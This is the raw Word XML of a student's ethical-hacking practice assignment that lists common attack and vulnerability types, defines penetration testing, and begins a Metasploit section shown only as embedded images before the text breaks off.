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color w:val="3d85c6"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6tqexd1lf0r0" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="3d85c6"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practice Problem on Ethical Hacking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76" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: Abhishek Srivastava</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Registration Number: 19BCE10071</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_age1ktkwycp0" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Questions - 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tas8yxad3p6d" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Various Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="460" w:before="160" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A cyber attack is when an individual or an organization deliberately and maliciously attempts to breach the information system of another individual or organization. While there is usually an economic goal, some recent attacks show the destruction of data as a goal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:spacing w:after="460" w:before="160" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious actors often look for ransom or other kinds of economic gain, but attacks can be perpetrated with an array of motives, including political activism purposes. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:spacing w:after="460" w:before="160" w:line="276" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Man-in-the-Middle (MitM) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Denial-of-Service (DOS) Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-day Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rootkits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IoT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6x008bg3c2re" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer security vulnerabilities can be divided into numerous types based on different criteria—such as where the vulnerability exists, what caused it, or how it could be used. Some broad categories of these vulnerability types include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Vulnerabilities. These are issues with a network’s hardware or software that expose it to possible intrusion by an outside party. Examples include insecure Wi-Fi access points and poorly-configured firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Operating System Vulnerabilities. These are vulnerabilities within a particular operating system that hackers may exploit to gain access to an asset the OS is installed on—or to cause damage. Examples include default superuser accounts that may exist in some OS installs and hidden backdoor programs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Human Vulnerabilities. The weakest link in many cybersecurity architectures is the human element. User errors can easily expose sensitive data, create exploitable access points for attackers, or disrupt systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Vulnerabilities. Some vulnerabilities can be created by specific process controls (or a lack thereof). One example would be the use of weak passwords (which may also fall under human vulnerabilities).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden Backdoor Programs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Superuser or Admin Account Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Running of Scripts without Malware/Virus Checks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unknown Security Bugs in Software or Programming Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unencrypted Data on the Network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_22uttov903mv" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Questions - 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>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A penetration test, also known as a pen test, is a simulated cyber attack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall (WAF).</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Pen testing can involve the attempted breaching of any number of application systems, (e.g., application protocol interfaces (APIs), frontend/backend servers) to uncover vulnerabilities, such as unsanitized inputs that are susceptible to code injection attacks.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Insights provided by the penetration test can be used to fine-tune your WAF security policies and patch detected vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2946400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pentesting Using Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1270000"/>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left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2790825" cy="9906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908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jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
